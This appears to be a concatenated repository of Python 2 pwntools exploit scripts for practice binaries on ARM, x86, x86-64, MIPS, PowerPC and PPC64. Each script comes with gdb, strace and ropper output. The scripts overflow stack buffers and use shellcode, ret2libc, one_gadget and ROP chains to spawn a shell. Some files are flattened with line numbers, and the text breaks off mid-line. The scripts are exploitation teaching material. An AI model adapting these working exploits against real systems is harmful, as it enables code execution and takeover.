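17211 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000
...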
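"""

"""
$ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so
0x00008b28 (0x00008b29): blx sp;
"""

# 04-shellcode-static (arm): "static" because the return address is pointed
# straight at a hard-coded stack address - the word right after the
# overwritten pc slot, where the shellcode is placed. That requires an
# executable stack and ASLR off; the address is even, so the CPU executes
# the shellcraft output in ARM (not Thumb) state.
#
# Review fix: `libc_addr` and the `blx sp` gadget transcript above belong to
# the dynamic variant (05) and are unused here; the dead variable is dropped.
# Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='arm', os='linux', endian='little', word_size=32)

binary_path = './bin/arm/04-shellcode-static'

saved_pc_addr = 0xfffeef70 + 4   # r7 popped first, pc second
buffer_addr = 0xfffeeef0

shellcode = asm(shellcraft.sh())

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_pc_addr - buffer_addr)
payload += p32(saved_pc_addr + 4)   # pc := address of the bytes that follow
payload += shellcode

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/arm/05-shellcode-dynamic.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x00010490 <+0>:     push    {r7, lr}
   ...
   0x000104d0 <+64>:    pop     {r7, pc}
End of assembler dump.
(gdb) b *0x000104d0
Breakpoint 1 at 0x104d0: file src/05-shellcode-dynamic.c, line 14.
(gdb) c
Continuing.

Breakpoint 1, 0x000104d0 in vulnerable () at src/05-shellcode-dynamic.c:14
14      }
(gdb) p &buffer[0]
$1 = 0xfffeef00 'a' , "WSt\377"
(gdb) i r $sp
sp             0xfffeef80       0xfffeef80
"""

"""
$ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/05-shellcode-dynamic
...
18200 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3
...
18200 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000
...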
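"""

"""
$ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so
0x00008b28 (0x00008b29): blx sp;
"""

# 05-shellcode-dynamic (arm): "dynamic" because no stack address is hard-coded
# in the payload. The pc slot is pointed at a `blx sp` gadget in libc; after
# `pop {r7, pc}` sp already points at the bytes following the slot, i.e. the
# shellcode. The gadget lives at a Thumb address (odd, 0x...29) while the
# shellcode is ARM - `blx` to the even sp value switches back to ARM state.
#
# NOTE(review): the libc base is the mmap2 result from the strace above and
# the gadget offset was taken from the host's cross libc-2.27.so, so this
# only works with ASLR off and that exact libc build. Executable stack is
# still required. Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='arm', os='linux', endian='little', word_size=32)

binary_path = './bin/arm/05-shellcode-dynamic'

saved_pc_addr = 0xfffeef80 + 4   # r7 popped first, pc second
buffer_addr = 0xfffeef00
libc_addr = 0xff6a9000           # from the strace mmap2 of libc.so.6

blx_sp_addr = libc_addr + 0x00008b29   # ropper: 0x00008b28 (0x00008b29): blx sp

shellcode = asm(shellcraft.sh())

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_pc_addr - buffer_addr)
payload += p32(blx_sp_addr)   # pc := blx sp; sp then points at the shellcode
payload += shellcode

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/ppc64/02-overwrite-ret.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x000000001000082c <+0>:     mflr    r0
   0x0000000010000830 <+4>:     std     r0,16(r1)
   ...
   0x000000001000088c <+96>:    ld      r0,16(r1)
   0x0000000010000890 <+100>:   mtlr    r0
   0x0000000010000894 <+104>:   ld      r31,-8(r1)
   0x0000000010000898 <+108>:   blr
   0x000000001000089c <+112>:   .long 0x0
   0x00000000100008a0 <+116>:   .long 0x1
   0x00000000100008a4 <+120>:   lwz     r0,1(r1)
End of assembler dump.
(gdb) b vulnerable
Breakpoint 1 at 0x10000840: file src/02-overwrite-ret.c, line 11.
(gdb) b *0x000000001000088c
Breakpoint 2 at 0x1000088c: file src/02-overwrite-ret.c, line 16.
(gdb) c
Continuing.

Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11
11          printf("> ");
(gdb) p &buffer[0]
$1 = 0x40007ff940 ""
(gdb) c
Continuing.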
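
Breakpoint 2, 0x000000001000088c in vulnerable () at src/02-overwrite-ret.c:16
16      }
(gdb) p/x $r1+16
$2 = 0x40007ff9e0
(gdb) p not_called
$3 = {void ()} 0x100007d4
"""

# 02-overwrite-ret (ppc64, big-endian): the prologue saves LR at 16(r1) and
# the epilogue reloads it from there (`ld r0,16(r1); mtlr r0; blr`), so
# $r1+16 at breakpoint 2 is the slot to overwrite. Padding = slot - buffer
# (0xa0 bytes).
#
# Unlike the other scripts, not_called's address is hard-coded from gdb
# rather than read from ELF(...).symbols - presumably because on big-endian
# ppc64 (ELFv1 ABI) the symbol value is a function descriptor, not the code
# address; gdb's `p not_called` gives the entry point directly.
#
# NOTE(review): stack addresses assume ASLR off and a matching environment;
# the code address is tied to this exact build. Python 2 pwntools.

import struct
import sys

from pwn import *

context(arch='powerpc64', os='linux', endian='big', word_size=64)

binary_path = './bin/ppc64/02-overwrite-ret'

saved_pc_addr = 0x40007ff9e0   # $r1+16 at the epilogue breakpoint
buffer_addr = 0x40007ff940
not_called_addr = 0x100007d4   # gdb: p not_called

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_pc_addr - buffer_addr)
payload += p64(not_called_addr)   # loaded into LR, then `blr`

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/x86/05-shellcode-dynamic.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) b *(&vulnerable)
Breakpoint 1 at 0x80484e6: file src/05-shellcode-dynamic.c, line 5.
(gdb) c
Continuing.
Reading /lib/i386-linux-gnu/libc.so.6 from remote target...
Reading /lib/i386-linux-gnu/libc-2.27.so from remote target...
Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target...

Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:5
5       int vulnerable() {
(gdb) i r $esp
esp            0xffffcf8c       0xffffcf8c
(gdb) p &buffer[0]
$1 = 0xffffcf00 ""
(gdb) info proc mappings
process 7378
Mapped address spaces:

          Start Addr   End Addr       Size     Offset objfile
...
          0xf7dd1000 0xf7fa6000   0x1d5000        0x0 /lib/i386-linux-gnu/libc-2.27.so
          0xf7fa6000 0xf7fa7000     0x1000   0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
          0xf7fa7000 0xf7fa9000     0x2000   0x1d5000 /lib/i386-linux-gnu/libc-2.27.so
          0xf7fa9000 0xf7faa000     0x1000   0x1d7000 /lib/i386-linux-gnu/libc-2.27.so
...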
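"""

# 05-shellcode-dynamic (x86): the return address is pointed at a `jmp esp`
# gadget inside libc. After `ret` pops the slot, esp points at the bytes
# that follow it, so the shellcode placed there runs without hard-coding a
# stack address. The gadget is located by scanning the libc file on disk and
# rebasing onto the mapping start from `info proc mappings` above.
#
# NOTE(review): requires an executable stack, ASLR off (both the stack
# padding and the libc base are fixed values from one session) and the exact
# libc-2.27 build the gadget was found in. Python 2 pwntools (`.next()`).

import struct
import sys

from pwn import *

context(arch='x86', os='linux', endian='little', word_size=32)

binary_path = './bin/x86/05-shellcode-dynamic'
libc_path = '/lib/i386-linux-gnu/libc-2.27.so'

vulnerable_ret_addr = 0xffffcf8c   # $esp before the prologue == return-address slot
buffer_addr = 0xffffcf00
libc_addr = 0xf7dd1000             # first libc mapping above

libc = ELF(libc_path)
jmp_esp_asm = asm('jmp esp')
jmp_esp_addr = libc_addr + libc.search(jmp_esp_asm).next()   # file offset -> runtime address

shellcode = asm(shellcraft.sh())

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (vulnerable_ret_addr - buffer_addr)
payload += p32(jmp_esp_addr)   # ret -> jmp esp -> shellcode below
payload += shellcode

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/arm/06-system-rop.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) disassemble vulnerable
Dump of assembler code for function vulnerable:
   0x00010460 <+0>:     push    {r7, lr}
   ...
   0x00010498 <+56>:    pop     {r7, pc}
End of assembler dump.
(gdb) b *0x00010498
Breakpoint 1 at 0x10498: file src/06-system-rop.c, line 11.
(gdb) c
Continuing.

Breakpoint 1, 0x00010498 in vulnerable () at src/06-system-rop.c:11
11      }
(gdb) p &buffer[0]
$1 = 0xfffeef00 'a' , "\251\004\001"
(gdb) i r $sp
sp             0xfffeef80       0xfffeef80
"""

"""
$ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/06-system-rop
...
28159 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3
...
28159 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000
...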
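"""

"""
$ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so
0x0004c630 (0x0004c631): pop {r0, pc};
"""

# 06-system-rop (arm): return-to-libc without shellcode, so no executable
# stack is needed. The chain is
#   pop {r0, pc}   <- overwritten pc slot
#   "/bin/sh" ptr  <- popped into r0 (first argument register on ARM)
#   system         <- popped into pc
# The gadget offset is from the host's cross libc, the `/bin/sh` string and
# system() come from the same file, all rebased onto the strace mmap2 base.
# The gadget address is odd (Thumb), which is what the ropper line reports.
#
# NOTE(review): ASLR must be off (fixed stack padding and libc base) and the
# libc must be exactly this build. Python 2 pwntools (`.next()`).

import struct
import sys

from pwn import *

context(arch='arm', os='linux', endian='little', word_size=32)

binary_path = './bin/arm/06-system-rop'
libc_path = '/usr/arm-linux-gnueabihf/lib/libc-2.27.so'

saved_pc_addr = 0xfffeef80 + 4   # r7 popped first, pc second
buffer_addr = 0xfffeef00
libc_addr = 0xff6a9000           # from the strace mmap2 of libc.so.6

pop_r0_pc_addr = libc_addr + 0x0004c631   # ropper: pop {r0, pc} (Thumb)

libc = ELF(libc_path)
system_addr = libc_addr + libc.symbols['system']
bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next()

p = process(binary_path)
#p = gdb.debug([binary_path])

payload = ''
payload += 'a' * (saved_pc_addr - buffer_addr)
payload += p32(pop_r0_pc_addr)   # pc := gadget
payload += p32(bin_sh_addr)      # -> r0
payload += p32(system_addr)      # -> pc

p.readuntil('> ')
p.write(payload)
p.interactive()
--------------------------------------------------------------------------------
/pwn/x86/06-system-rop.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

"""
(gdb) b *(&vulnerable)
Breakpoint 1 at 0x80484b6: file src/06-system-rop.c, line 5.
(gdb) c
Continuing.
Reading /lib/i386-linux-gnu/libc.so.6 from remote target...
Reading /lib/i386-linux-gnu/libc-2.27.so from remote target...
Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target...

Breakpoint 1, vulnerable () at src/06-system-rop.c:5
5       int vulnerable() {
(gdb) i r $esp
esp            0xffffcf8c       0xffffcf8c
(gdb) p &buffer[0]
$1 = 0xffffcf00 ""
(gdb) info proc mappings
process 14115
Mapped address spaces:

          Start Addr   End Addr       Size     Offset objfile
...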
24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | import struct 32 | import sys 33 | 34 | from pwn import * 35 | 36 | context(arch='x86', os='linux', endian='little', word_size=32) 37 | 38 | binary_path = './bin/x86/06-system-rop' 39 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 40 | 41 | vulnerable_ret_addr = 0xffffcf8c 42 | buffer_addr = 0xffffcf00 43 | libc_addr = 0xf7dd1000 44 | 45 | libc = ELF(libc_path) 46 | system_addr = libc_addr + libc.symbols['system'] 47 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 48 | 49 | p = process(binary_path) 50 | #p = gdb.debug([binary_path]) 51 | 52 | payload = '' 53 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 54 | payload += p32(system_addr) 55 | payload += p32(0) # fake return address from system 56 | payload += p32(bin_sh_addr) 57 | 58 | p.readuntil('> ') 59 | p.write(payload) 60 | p.interactive() 61 | -------------------------------------------------------------------------------- /pwn/mips/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x004007c0 <+0>: addiu sp,sp,-160 7 | 0x004007c4 <+4>: sw ra,156(sp) 8 | ... 9 | 0x0040085c <+156>: lw ra,156(sp) 10 | 0x00400860 <+160>: lw s8,152(sp) 11 | 0x00400864 <+164>: addiu sp,sp,160 12 | 0x00400868 <+168>: jr ra 13 | 0x0040086c <+172>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x4007dc: file src/04-shellcode-static.c, line 6. 17 | (gdb) b *0x0040085c 18 | Breakpoint 2 at 0x40085c: file src/04-shellcode-static.c, line 14. 19 | (gdb) c 20 | Continuing. 
21 | 22 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef58 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x0040085c in vulnerable () at src/04-shellcode-static.c:14 30 | 14 } 31 | (gdb) p/x $sp+156 32 | $2 = 0x7fffefdc 33 | """ 34 | 35 | """ 36 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/04-shellcode-static 37 | ... 38 | 18573 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 18573 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 41 | ... 42 | """ 43 | 44 | import struct 45 | import sys 46 | 47 | from pwn import * 48 | 49 | context(arch='mips', os='linux', endian='big', word_size=32) 50 | 51 | binary_path = './bin/mips/04-shellcode-static' 52 | 53 | ra_saved_addr = 0x7fffefdc 54 | buffer_addr = 0x7fffef58 55 | libc_addr = 0x7f615000 56 | 57 | shellcode = asm(shellcraft.sh()) 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (ra_saved_addr - buffer_addr) 64 | payload += p32(ra_saved_addr + 4) 65 | payload += shellcode 66 | 67 | p.readuntil('> ') 68 | p.write(payload) 69 | p.interactive() 70 | -------------------------------------------------------------------------------- /pwn/x86/03-one-gadget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484b6: file src/03-one-gadget.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 
11 | 12 | Breakpoint 1, vulnerable () at src/03-one-gadget.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf8c 0xffffcf8c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcf00 "" 18 | (gdb) info proc mappings 19 | process 1924 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ one_gadget /lib/i386-linux-gnu/libc-2.27.so 33 | 0x3d0d3 execve("/bin/sh", esp+0x34, environ) 34 | constraints: 35 | esi is the GOT address of libc 36 | [esp+0x34] == NULL 37 | ... 38 | """ 39 | 40 | import struct 41 | import sys 42 | 43 | from pwn import * 44 | 45 | context(arch='x86', os='linux', endian='little', word_size=32) 46 | 47 | binary_path = './bin/x86/03-one-gadget' 48 | 49 | vulnerable_ret_addr = 0xffaf368c 50 | buffer_addr = 0xffaf3600 51 | libc_addr = 0xf7dd1000 52 | one_gadget_addr = libc_addr + 0x3d0d3 53 | 54 | p = process(binary_path) 55 | #p = gdb.debug([binary_path]) 56 | 57 | payload = '' 58 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 59 | payload += p32(one_gadget_addr) 60 | payload += p32(0) * ((256 - len(payload)) / 4) 61 | 62 | p.readuntil('> ') 63 | p.write(payload) 64 | p.interactive() 65 | -------------------------------------------------------------------------------- /pwn/x86-64/03-one-gadget.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x4005b7: file src/03-one-gadget.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 
10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/03-one-gadget.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffddf8 0x7fffffffddf8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd70 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 12820 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ one_gadget ./x86-64-libc-2.27.so 33 | 0x4f322 execve("/bin/sh", rsp+0x40, environ) 34 | constraints: 35 | [rsp+0x40] == NULL 36 | ... 37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='amd64', os='linux', endian='little', word_size=64) 45 | 46 | binary_path = './bin/x86-64/03-one-gadget' 47 | 48 | vulnerable_ret_addr = 0x7fffffffddf8 49 | buffer_addr = 0x7fffffffdd70 50 | libc_addr = 0x7ffff79e4000 51 | one_gadget_addr = libc_addr + 0x4f322 52 | 53 | p = process(binary_path) 54 | #p = gdb.debug([binary_path]) 55 | 56 | payload = '' 57 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 58 | payload += p64(one_gadget_addr) 59 | payload += p64(0) * ((256 - len(payload)) / 8) 60 | 61 | p.readuntil('> ') 62 | p.write(payload) 63 | p.interactive() 64 | -------------------------------------------------------------------------------- /pwn/ppc/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000054c <+0>: stwu r1,-144(r1) 7 | ... 
8 | 0x100005a8 <+92>: lwz r0,4(r11) 9 | 0x100005ac <+96>: mtlr r0 10 | 0x100005a8 <+100>: lwz r31,-4(r11) 11 | 0x100005b4 <+104>: mr r1,r11 12 | 0x100005b8 <+108>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000560: file src/04-shellcode-static.c, line 6. 16 | (gdb) b *0x100005a8 17 | Breakpoint 2 at 0x100005a8: file src/04-shellcode-static.c, line 14. 18 | (gdb) c 19 | Continuing. 20 | 21 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 22 | 6 printf("> "); 23 | (gdb) p &buffer[0] 24 | $1 = 0xffffdd58 "\377\377\335", 25 | (gdb) c 26 | Continuing. 27 | 28 | Breakpoint 2, 0x100005a8 in vulnerable () at src/04-shellcode-static.c:14 29 | 14 } 30 | (gdb) p/x $r11+4 31 | $2 = 0xffffdde4 32 | """ 33 | 34 | import struct 35 | import sys 36 | 37 | from pwn import * 38 | 39 | context(arch='powerpc', os='linux', endian='big', word_size=32) 40 | 41 | binary_path = './bin/ppc/04-shellcode-static' 42 | 43 | saved_pc_addr = 0xffffdde4 44 | buffer_addr = 0xffffdd58 45 | 46 | # Adapted from http://shell-storm.org/shellcode/files/shellcode-86.php 47 | shellcode = \ 48 | '\x7c\x3f\x0b\x78' + \ 49 | '\x7c\xa5\x2a\x79' + \ 50 | '\x42\x40\xff\xf9' + \ 51 | '\x7f\x08\x02\xa6' + \ 52 | '\x3b\x18\x01\x34' + \ 53 | '\x98\xb8\xfe\xfb' + \ 54 | '\x38\x78\xfe\xf4' + \ 55 | '\x90\x61\xff\xf8' + \ 56 | '\x38\x81\xff\xf8' + \ 57 | '\x90\xa1\xff\xfc' + \ 58 | '\x3b\xc0\x01\x60' + \ 59 | '\x7f\xc0\x2e\x70' + \ 60 | '\x44\x00\x00\x00' + \ 61 | '/bin/shZ' 62 | 63 | p = process(binary_path) 64 | #p = gdb.debug([binary_path]) 65 | 66 | payload = '' 67 | payload += 'a' * (saved_pc_addr - buffer_addr) 68 | payload += p32(saved_pc_addr + 4) 69 | payload += shellcode 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/x86/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 
| 3 | """ 4 | (gdb) bt 5 | #0 0xf7fd5059 in __kernel_vsyscall () 6 | #1 0xf7eb7cd7 in read () from /lib/i386-linux-gnu/libc.so.6 7 | #2 0x08048526 in vulnerable () at src/04-shellcode-static.c:10 8 | #3 0x08048552 in main (argc=1, argv=0xffffd0a4) at src/04-shellcode-static.c:17 9 | (gdb) disassemble vulnerable 10 | Dump of assembler code for function vulnerable: 11 | 0x080484e6 <+0>: push ebp 12 | ... 13 | 0x0804853b <+85>: ret 14 | End of assembler dump. 15 | (gdb) b *0x0804853b 16 | Breakpoint 1 at 0x804853b: file src/04-shellcode-static.c, line 14. 17 | (gdb) c 18 | Continuing. 19 | 20 | Breakpoint 1, 0x0804853b in vulnerable () at src/04-shellcode-static.c:14 21 | 14 } 22 | (gdb) p &buffer[0] 23 | $1 = 0xffffcf60 'a' , "\001" 24 | (gdb) i r $sp 25 | sp 0xffffcfec 0xffffcfec 26 | (gdb) info proc mappings 27 | process 28174 28 | Mapped address spaces: 29 | 30 | Start Addr End Addr Size Offset objfile 31 | ... 32 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 33 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 34 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 35 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 36 | ... 
37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='x86', os='linux', endian='little', word_size=32) 45 | 46 | binary_path = './bin/x86/04-shellcode-static' 47 | libc_path = '/lib/i386-linux-gnu/libc-2.27.so' 48 | 49 | vulnerable_ret_addr = 0xffffcfec 50 | buffer_addr = 0xffffcf60 51 | libc_addr = 0xf7dd1000 52 | 53 | shellcode = asm(shellcraft.sh()) 54 | 55 | p = process(binary_path) 56 | #g = gdb.attach(p, 'file ./bin/x86/04-shellcode-static') 57 | 58 | payload = '' 59 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 60 | payload += p32(vulnerable_ret_addr + 4) 61 | payload += shellcode 62 | 63 | p.readuntil('> ') 64 | p.write(payload) 65 | p.interactive() 66 | -------------------------------------------------------------------------------- /pwn/arm/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010460 <+0>: push {r7, lr} 7 | ... 8 | 0x00010498 <+56>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x00010498 11 | Breakpoint 1 at 0x10498: file src/07-execve-rop.c, line 11. 12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x00010498 in vulnerable () at src/07-execve-rop.c:11 16 | 11 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeeef0 'a' , "\225\035p\377,\357w\377" 19 | (gdb) i r $sp 20 | sp 0xfffeef70 0xfffeef70 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/07-execve-rop 25 | ... 26 | 28850 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 28850 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 
30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x00058d94 (0x00058d95): pop {r0, r1, r2, r6, r7, pc}; 35 | 0x00017204 (0x00017205): svc #0; pop {r7, pc}; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='arm', os='linux', endian='little', word_size=32) 44 | 45 | binary_path = './bin/arm/07-execve-rop' 46 | libc_path = '/usr/arm-linux-gnueabihf/lib/libc-2.27.so' 47 | 48 | saved_pc_addr = 0xfffeef70 + 4 49 | buffer_addr = 0xfffeeef0 50 | libc_addr = 0xff6a9000 51 | 52 | pop_all_addr = libc_addr + 0x00058d95 53 | svc_addr = libc_addr + 0x00017205 54 | 55 | libc = ELF(libc_path) 56 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 57 | 58 | p = process(binary_path) 59 | #p = gdb.debug([binary_path]) 60 | 61 | payload = '' 62 | payload += 'a' * (saved_pc_addr - buffer_addr) 63 | payload += p32(pop_all_addr) 64 | payload += p32(bin_sh_addr) # r0 65 | payload += p32(0) # r1 66 | payload += p32(0) # r2 67 | payload += p32(0) # r6 68 | payload += p32(0xb) # r7, execve 69 | payload += p32(svc_addr) # pc 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/x86-64/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x400607: file src/05-shellcode-dynamic.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:5 13 | warning: Source file is more recent than executable. 
14 | 5 int vulnerable() { 15 | (gdb) i r $rsp 16 | rsp 0x7fffffffddf8 0x7fffffffddf8 17 | (gdb) p &buffer[0] 18 | $1 = 0x7fffffffdd70 "\377\377\377\377" 19 | (gdb) info proc mappings 20 | process 13562 21 | Mapped address spaces: 22 | 23 | Start Addr End Addr Size Offset objfile 24 | ... 25 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 29 | """ 30 | 31 | import struct 32 | import sys 33 | 34 | from pwn import * 35 | 36 | context(arch='amd64', os='linux', endian='little', word_size=64) 37 | 38 | binary_path = './bin/x86-64/05-shellcode-dynamic' 39 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 40 | 41 | vulnerable_ret_addr = 0x7fffffffddf8 42 | buffer_addr = 0x7fffffffdd70 43 | libc_addr = 0x7ffff79e4000 44 | 45 | libc = ELF(libc_path) 46 | jmp_rsp_asm = asm('jmp rsp') 47 | jmp_rsp_addr = libc_addr + libc.search(jmp_rsp_asm).next() 48 | 49 | shellcode = 